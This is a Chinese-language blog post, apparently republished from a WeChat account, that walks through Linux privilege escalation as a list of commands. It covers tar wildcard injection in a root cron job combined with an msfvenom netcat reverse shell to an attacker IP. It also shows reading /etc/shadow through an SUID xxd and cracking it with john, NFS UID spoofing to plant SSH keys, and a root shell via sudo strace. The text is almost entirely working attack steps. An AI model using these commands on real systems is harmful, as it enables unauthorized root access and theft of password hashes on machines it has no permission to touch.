cat /etc/crontab
发现一个叫cron.daily/backup 以root权限每分钟执行的文件
ls -l /etc/cron.daily/backup
发现是文件
cat /etc/cron.daily/backup
查看文件内容
发现是一个备份程序之类的
会打开home目录,进一步打开每一个用户的文件,进行备份那它既然每分钟执行一次...... 搞一个木马进去!!
02.生成木马:
kali上:
msfvenom -p cmd/unix/reverse_netcat lhost=[黑客IP] lport=8888 R
R 生成一个源代码
复制这个源代码
03.注入木马:
返回入侵的Linux
echo [源代码] > shell.sh &&chmod +x shell.sh
使tar执行这个源代码:【让tar把源代码当作一个程序进行执行】
echo > "--checkpoint-action=exec=sh shell.sh"
echo > "--checkpoint=1"
【tar会将部分文件名解析为参数,实现越权】
04.黑客监听:
nc -lvvp 8888
02.SID提权:
guest 下:
find / -perm -4000 -type f -exec ls -al {} ; 2>/dev/null
查看自己所在用户可以执行的文件
【Permission denied:权限不允许。】
查找/user/bin目录里面可以执行的
/user/bin/xxd 【xxd:一个小工具】
xxd /etc/shadow | xxd -r
可以看到etc/shadow的加密密码
复制root那一条
并且放于一个全新的文件里面【pass.txt】
kali新建命令行:
john pass.txt -w=/usr/share/wordlists/rockyou.txt
【查看这个目录下是否存在文件rockyou.txt,可能是一个压缩文件,记得解压】使用这个密码本进行暴力拆解,大概率会穷举出密码。
03.NFS提权:(2049端口)
nmap 扫描目标ip端口
假若出现2049 【nfs协议,网络文件远程协议端口】
可以进行尝试
使用kali执行挂载:
showmount -e
发现挂载了/home/guest
【即/home/guest的目录是开放的】
cd /tmp 进入临时文件夹
mkdir nfs
cd nfs
mount -t nfs [目标ip]:/home/guest /tmp/nfs/
ls -la /tmp/ntf/
查guest目录里的东西
cp /bin/bash /tmp/nfs/
将自己的bin/bash放到对方的目录里
【权限不够!!!】
【这里需要我们伪装一个和对方一样的guest】
cat etc passwd【ssh上】
【发现是1001 1005】
先去查看对方guest的各种数据
groupadd -g 1005 guest
adduser guest -uid 1001 -gid 1005
cd /tmp/nfs/
在nfs文件夹中执行:
su guest (换到kali中的guest用户)
mkdir .ssh 发现没有权限(此时在对方的guest中)
进入自己的guest:
cd ~
mkdir .ssh
ssh-keygen
然后查看key产生的文件目录 记录一下
cd /tmp/nfs (回到对方的guest)
mkdir .ssh
cat ~/.ssh/id_rsa.pub > ./.ssh/authorized_keys
把自己的公钥放在对方的au...文件里面
cd ~/.ssh
ssh -i id_rsa peter@[对方ip]
免密码使用ssh登入:将自己的公钥想办法放到对方的au...文件里面,然后使用命令连接。
sudo -l
查看自己可以运行什么命令
/usr/bin/strace
sudo strace -o /dev/null /bin/sh
whoami
成功 root
-----------------------------------------------------
好了,今天就到这里,辛苦大佬观看。
麻烦各位大佬指点,week给大佬趴下了。
原文始发于微信公众号(week网安热爱者):linux 权限提升:进阶篇
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论